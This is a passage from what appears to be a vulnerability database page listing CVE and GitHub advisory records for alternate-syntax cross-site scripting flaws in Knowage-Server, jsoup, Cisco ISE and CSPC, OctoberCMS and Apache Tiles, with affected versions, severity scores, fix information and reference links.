CWE-87
AllowedImproper Neutralization of Alternate XSS Syntax
Abstraction: Variant · Status: Draft
The product does not neutralize or incorrectly neutralizes user-controlled input for alternate script syntax.
98 vulnerabilities reference this CWE, most recent first.
CVE-2022-39295 (GCVE-0-2022-39295)
Vulnerability from cvelistv5 – Published: 2022-10-13 00:00 – Updated: 2025-04-22 17:18| Vendor | Product | Version | |
|---|---|---|---|
| KnowageLabs | Knowage-Server |
Affected:
>= 6.0, < 7.4.22
Affected: >= 8.0, < 8.0.9 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T12:00:43.794Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/KnowageLabs/Knowage-Server/security/advisories/GHSA-f2gr-6h9j-rwcw"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/KnowageLabs/Knowage-Server/blob/b079a654c1708f82f6914c55be6715ad621d9edd/knowageutils/src/main/java/it/eng/spagobi/utilities/filters/XSSRequestWrapper.java#L82-L206"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-39295",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-22T15:43:36.448157Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-22T17:18:42.596Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Knowage-Server",
"vendor": "KnowageLabs",
"versions": [
{
"status": "affected",
"version": "\u003e= 6.0, \u003c 7.4.22"
},
{
"status": "affected",
"version": "\u003e= 8.0, \u003c 8.0.9"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Knowage is an open source suite for modern business analytics alternative over big data systems. KnowageLabs / Knowage-Server starting with the 6.x branch and prior to versions 7.4.22, 8.0.9, and 8.1.0 is vulnerable to cross-site scripting because the `XSSRequestWrapper::stripXSS` method can be bypassed. Versions 7.4.22, 8.0.9, and 8.1.0 contain patches for this issue. There are no known workarounds."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-87",
"description": "CWE-87: Improper Neutralization of Alternate XSS Syntax",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-10-13T00:00:00.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"url": "https://github.com/KnowageLabs/Knowage-Server/security/advisories/GHSA-f2gr-6h9j-rwcw"
},
{
"url": "https://github.com/KnowageLabs/Knowage-Server/blob/b079a654c1708f82f6914c55be6715ad621d9edd/knowageutils/src/main/java/it/eng/spagobi/utilities/filters/XSSRequestWrapper.java#L82-L206"
}
],
"source": {
"advisory": "GHSA-f2gr-6h9j-rwcw",
"discovery": "UNKNOWN"
},
"title": "Improper Neutralization of Alternate XSS Syntax in Knowage-Server"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2022-39295",
"datePublished": "2022-10-13T00:00:00.000Z",
"dateReserved": "2022-09-02T00:00:00.000Z",
"dateUpdated": "2025-04-22T17:18:42.596Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-36033 (GCVE-0-2022-36033)
Vulnerability from cvelistv5 – Published: 2022-08-29 00:00 – Updated: 2025-04-22 17:41{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T09:51:59.964Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/jhy/jsoup/security/advisories/GHSA-gp7f-rwcx-9369"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/jhy/jsoup/releases/tag/jsoup-1.15.3"
},
{
"tags": [
"x_transferred"
],
"url": "https://jsoup.org/news/release-1.15.3"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20221104-0006/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-36033",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-22T15:44:56.200275Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-22T17:41:13.666Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "jsoup",
"vendor": "jhy",
"versions": [
{
"status": "affected",
"version": "\u003c 1.15.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "jsoup is a Java HTML parser, built for HTML editing, cleaning, scraping, and cross-site scripting (XSS) safety. jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow XSS attacks when a reader subsequently clicks that link. If the non-default `SafeList.preserveRelativeLinks` option is enabled, HTML including `javascript:` URLs that have been crafted with control characters will not be sanitized. If the site that this HTML is published on does not set a Content Security Policy, an XSS attack is then possible. This issue is patched in jsoup 1.15.3. Users should upgrade to this version. Additionally, as the unsanitized input may have been persisted, old content should be cleaned again using the updated version. To remediate this issue without immediately upgrading: - disable `SafeList.preserveRelativeLinks`, which will rewrite input URLs as absolute URLs - ensure an appropriate [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) is defined. (This should be used regardless of upgrading, as a defence-in-depth best practice.)"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-87",
"description": "CWE-87: Improper Neutralization of Alternate XSS Syntax",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-04T00:00:00.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"url": "https://github.com/jhy/jsoup/security/advisories/GHSA-gp7f-rwcx-9369"
},
{
"url": "https://github.com/jhy/jsoup/releases/tag/jsoup-1.15.3"
},
{
"url": "https://jsoup.org/news/release-1.15.3"
},
{
"url": "https://security.netapp.com/advisory/ntap-20221104-0006/"
}
],
"source": {
"advisory": "GHSA-gp7f-rwcx-9369",
"discovery": "UNKNOWN"
},
"title": "jsoup may not sanitize Cross-Site Scripting (XSS) attempts if SafeList.preserveRelativeLinks is enabled"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2022-36033",
"datePublished": "2022-08-29T00:00:00.000Z",
"dateReserved": "2022-07-15T00:00:00.000Z",
"dateUpdated": "2025-04-22T17:41:13.666Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-20963 (GCVE-0-2022-20963)
Vulnerability from cvelistv5 – Published: 2022-11-03 19:32 – Updated: 2024-10-25 16:05- CWE-87 - Improper Neutralization of Alternate XSS Syntax
| Vendor | Product | Version | |
|---|---|---|---|
| Cisco | Cisco Identity Services Engine Software |
Affected:
2.6.0
Affected: 2.6.0 p1 Affected: 2.6.0 p2 Affected: 2.6.0 p3 Affected: 2.6.0 p5 Affected: 2.6.0 p6 Affected: 2.6.0 p7 Affected: 2.6.0 p8 Affected: 2.6.0 p9 Affected: 2.6.0 p10 Affected: 2.6.0 p11 Affected: 2.6.0 p12 Affected: 2.7.0 Affected: 2.7.0 p1 Affected: 2.7.0 p2 Affected: 2.7.0 p3 Affected: 2.7.0 p4 Affected: 2.7.0 p5 Affected: 2.7.0 p6 Affected: 2.7.0 p7 Affected: 3.0.0 Affected: 3.0.0 p1 Affected: 3.0.0 p2 Affected: 3.0.0 p3 Affected: 3.0.0 p4 Affected: 3.0.0 p5 Affected: 3.0.0 p6 Affected: 3.1.0 Affected: 3.1.0 p1 Affected: 3.1.0 p3 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T02:31:58.989Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "cisco-sa-ise-stor-xss-kpRBWXY",
"tags": [
"x_transferred"
],
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-stor-xss-kpRBWXY"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-20963",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-25T14:36:53.283258Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-25T16:05:01.705Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Cisco Identity Services Engine Software",
"vendor": "Cisco",
"versions": [
{
"status": "affected",
"version": "2.6.0"
},
{
"status": "affected",
"version": "2.6.0 p1"
},
{
"status": "affected",
"version": "2.6.0 p2"
},
{
"status": "affected",
"version": "2.6.0 p3"
},
{
"status": "affected",
"version": "2.6.0 p5"
},
{
"status": "affected",
"version": "2.6.0 p6"
},
{
"status": "affected",
"version": "2.6.0 p7"
},
{
"status": "affected",
"version": "2.6.0 p8"
},
{
"status": "affected",
"version": "2.6.0 p9"
},
{
"status": "affected",
"version": "2.6.0 p10"
},
{
"status": "affected",
"version": "2.6.0 p11"
},
{
"status": "affected",
"version": "2.6.0 p12"
},
{
"status": "affected",
"version": "2.7.0"
},
{
"status": "affected",
"version": "2.7.0 p1"
},
{
"status": "affected",
"version": "2.7.0 p2"
},
{
"status": "affected",
"version": "2.7.0 p3"
},
{
"status": "affected",
"version": "2.7.0 p4"
},
{
"status": "affected",
"version": "2.7.0 p5"
},
{
"status": "affected",
"version": "2.7.0 p6"
},
{
"status": "affected",
"version": "2.7.0 p7"
},
{
"status": "affected",
"version": "3.0.0"
},
{
"status": "affected",
"version": "3.0.0 p1"
},
{
"status": "affected",
"version": "3.0.0 p2"
},
{
"status": "affected",
"version": "3.0.0 p3"
},
{
"status": "affected",
"version": "3.0.0 p4"
},
{
"status": "affected",
"version": "3.0.0 p5"
},
{
"status": "affected",
"version": "3.0.0 p6"
},
{
"status": "affected",
"version": "3.1.0"
},
{
"status": "affected",
"version": "3.1.0 p1"
},
{
"status": "affected",
"version": "3.1.0 p3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device.\r\n\r This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker would need valid credentials to access the web-based management interface of an affected device."
}
],
"exploits": [
{
"lang": "en",
"value": "The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "cvssV3_1"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-87",
"description": "Improper Neutralization of Alternate XSS Syntax",
"lang": "en",
"type": "cwe"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-25T16:57:26.618Z",
"orgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
"shortName": "cisco"
},
"references": [
{
"name": "cisco-sa-ise-stor-xss-kpRBWXY",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-stor-xss-kpRBWXY"
}
],
"source": {
"advisory": "cisco-sa-ise-stor-xss-kpRBWXY",
"defects": [
"CSCwb75959"
],
"discovery": "EXTERNAL"
}
}
},
"cveMetadata": {
"assignerOrgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
"assignerShortName": "cisco",
"cveId": "CVE-2022-20963",
"datePublished": "2022-11-03T19:32:04.651Z",
"dateReserved": "2021-11-02T13:28:29.197Z",
"dateUpdated": "2024-10-25T16:05:01.705Z",
"requesterUserId": "4087f8c1-b21c-479b-99df-de23cb76b743",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-40131 (GCVE-0-2021-40131)
Vulnerability from cvelistv5 – Published: 2021-11-18 23:50 – Updated: 2024-11-07 21:42| URL | Tags |
|---|---|
| https://tools.cisco.com/security/center/content/C… | vendor-advisoryx_refsource_CISCO |
| Vendor | Product | Version | |
|---|---|---|---|
| Cisco | Cisco Common Services Platform Collector Software |
Affected:
n/a
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:27:31.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20211117 Cisco Common Services Platform Collector Stored Cross-Site Scripting Vulnerability",
"tags": [
"vendor-advisory",
"x_refsource_CISCO",
"x_transferred"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-CSPC-XSS-KjrNbM3p"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-40131",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-07T21:39:29.402836Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-07T21:42:03.760Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Cisco Common Services Platform Collector Software",
"vendor": "Cisco",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2021-11-17T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the web-based management interface of Cisco Common Services Platform Collector (CSPC) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input that is processed by the web-based management interface. An attacker could exploit this vulnerability by adding malicious code to the configuration by using the web-based management interface. A successful exploit could allow the attacker to execute arbitrary code in the context of the interface or access sensitive, browser-based information."
}
],
"exploits": [
{
"lang": "en",
"value": "The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-87",
"description": "CWE-87",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-18T23:50:29.000Z",
"orgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
"shortName": "cisco"
},
"references": [
{
"name": "20211117 Cisco Common Services Platform Collector Stored Cross-Site Scripting Vulnerability",
"tags": [
"vendor-advisory",
"x_refsource_CISCO"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-CSPC-XSS-KjrNbM3p"
}
],
"source": {
"advisory": "cisco-sa-CSPC-XSS-KjrNbM3p",
"defect": [
[
"CSCvx73336",
"CSCvx79930"
]
],
"discovery": "INTERNAL"
},
"title": "Cisco Common Services Platform Collector Stored Cross-Site Scripting Vulnerability",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "psirt@cisco.com",
"DATE_PUBLIC": "2021-11-17T16:00:00",
"ID": "CVE-2021-40131",
"STATE": "PUBLIC",
"TITLE": "Cisco Common Services Platform Collector Stored Cross-Site Scripting Vulnerability"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Cisco Common Services Platform Collector Software",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "Cisco"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in the web-based management interface of Cisco Common Services Platform Collector (CSPC) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input that is processed by the web-based management interface. An attacker could exploit this vulnerability by adding malicious code to the configuration by using the web-based management interface. A successful exploit could allow the attacker to execute arbitrary code in the context of the interface or access sensitive, browser-based information."
}
]
},
"exploit": [
{
"lang": "en",
"value": "The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory."
}
],
"impact": {
"cvss": {
"baseScore": "5.5",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-87"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20211117 Cisco Common Services Platform Collector Stored Cross-Site Scripting Vulnerability",
"refsource": "CISCO",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-CSPC-XSS-KjrNbM3p"
}
]
},
"source": {
"advisory": "cisco-sa-CSPC-XSS-KjrNbM3p",
"defect": [
[
"CSCvx73336",
"CSCvx79930"
]
],
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
"assignerShortName": "cisco",
"cveId": "CVE-2021-40131",
"datePublished": "2021-11-18T23:50:29.851Z",
"dateReserved": "2021-08-25T00:00:00.000Z",
"dateUpdated": "2024-11-07T21:42:03.760Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-5298 (GCVE-0-2020-5298)
Vulnerability from cvelistv5 – Published: 2020-06-03 21:55 – Updated: 2024-08-04 08:22- CWE-87 - Improper Neutralization of Alternate XSS Syntax
| URL | Tags |
|---|---|
| https://github.com/octobercms/october/security/ad… | x_refsource_CONFIRM |
| https://github.com/octobercms/october/commit/cd0b… | x_refsource_MISC |
| http://packetstormsecurity.com/files/158730/Octob… | x_refsource_MISC |
| http://seclists.org/fulldisclosure/2020/Aug/2 | mailing-listx_refsource_FULLDISC |
| Vendor | Product | Version | |
|---|---|---|---|
| octobercms | october |
Affected:
>= 1.0.319, < 1.0.466
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T08:22:09.102Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/octobercms/october/security/advisories/GHSA-gg6x-xx78-448c"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/octobercms/october/commit/cd0b6a791f995d86071a024464c1702efc50f46c"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/158730/October-CMS-Build-465-XSS-File-Read-File-Deletion-CSV-Injection.html"
},
{
"name": "20200804 October CMS \u003c= Build 465 Multiple Vulnerabilities - Arbitrary File Read",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2020/Aug/2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "october",
"vendor": "octobercms",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.0.319, \u003c 1.0.466"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, a user with the ability to use the import functionality of the `ImportExportController` behavior can be socially engineered by an attacker to upload a maliciously crafted CSV file which could result in a reflected XSS attack on the user in question Issue has been patched in Build 466 (v1.0.466)."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-87",
"description": "CWE-87: Improper Neutralization of Alternate XSS Syntax",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-08-04T11:06:06.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/octobercms/october/security/advisories/GHSA-gg6x-xx78-448c"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/octobercms/october/commit/cd0b6a791f995d86071a024464c1702efc50f46c"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/158730/October-CMS-Build-465-XSS-File-Read-File-Deletion-CSV-Injection.html"
},
{
"name": "20200804 October CMS \u003c= Build 465 Multiple Vulnerabilities - Arbitrary File Read",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2020/Aug/2"
}
],
"source": {
"advisory": "GHSA-gg6x-xx78-448c",
"discovery": "UNKNOWN"
},
"title": "Reflected XSS when importing CSV in OctoberCMS",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2020-5298",
"STATE": "PUBLIC",
"TITLE": "Reflected XSS when importing CSV in OctoberCMS"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "october",
"version": {
"version_data": [
{
"version_value": "\u003e= 1.0.319, \u003c 1.0.466"
}
]
}
}
]
},
"vendor_name": "octobercms"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, a user with the ability to use the import functionality of the `ImportExportController` behavior can be socially engineered by an attacker to upload a maliciously crafted CSV file which could result in a reflected XSS attack on the user in question Issue has been patched in Build 466 (v1.0.466)."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-87: Improper Neutralization of Alternate XSS Syntax"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/octobercms/october/security/advisories/GHSA-gg6x-xx78-448c",
"refsource": "CONFIRM",
"url": "https://github.com/octobercms/october/security/advisories/GHSA-gg6x-xx78-448c"
},
{
"name": "https://github.com/octobercms/october/commit/cd0b6a791f995d86071a024464c1702efc50f46c",
"refsource": "MISC",
"url": "https://github.com/octobercms/october/commit/cd0b6a791f995d86071a024464c1702efc50f46c"
},
{
"name": "http://packetstormsecurity.com/files/158730/October-CMS-Build-465-XSS-File-Read-File-Deletion-CSV-Injection.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/158730/October-CMS-Build-465-XSS-File-Read-File-Deletion-CSV-Injection.html"
},
{
"name": "20200804 October CMS \u003c= Build 465 Multiple Vulnerabilities - Arbitrary File Read",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2020/Aug/2"
}
]
},
"source": {
"advisory": "GHSA-gg6x-xx78-448c",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2020-5298",
"datePublished": "2020-06-03T21:55:12.000Z",
"dateReserved": "2020-01-02T00:00:00.000Z",
"dateUpdated": "2024-08-04T08:22:09.102Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-2C6Q-RGVJ-66RX
Vulnerability from github – Published: 2022-05-02 03:23 – Updated: 2024-01-23 18:19Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tiles:tiles-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.1"
},
{
"fixed": "2.1.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2009-1275"
],
"database_specific": {
"cwe_ids": [
"CWE-87",
"CWE-917"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-23T18:19:44Z",
"nvd_published_at": "2009-04-09T15:08:00Z",
"severity": "MODERATE"
},
"details": "Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) `tiles:putAttribute` and (2) `tiles:insertTemplate` JSP tags.",
"id": "GHSA-2c6q-rgvj-66rx",
"modified": "2024-01-23T18:19:44Z",
"published": "2022-05-02T03:23:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2009-1275"
},
{
"type": "WEB",
"url": "http://svn.apache.org/viewvc/tiles/framework/trunk/src/site/apt/security/security-bulletin-1.apt?revision=741913"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Apache Tiles Vulnerable to XSS via EL Expression Injection"
}
GHSA-2GGX-V668-H3CF
Vulnerability from github – Published: 2023-11-21 21:30 – Updated: 2023-11-21 21:30A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to conduct an XSS attack against a user of the web-based management interface of an affected device.
{
"affected": [],
"aliases": [
"CVE-2023-20208"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-87"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-21T19:15:08Z",
"severity": "MODERATE"
},
"details": "A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to conduct an XSS attack against a user of the web-based management interface of an affected device.",
"id": "GHSA-2ggx-v668-h3cf",
"modified": "2023-11-21T21:30:23Z",
"published": "2023-11-21T21:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20208"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-mult-j-KxpNynR"
}
],
"schema_version": "1.4.0",
"severity": [
{
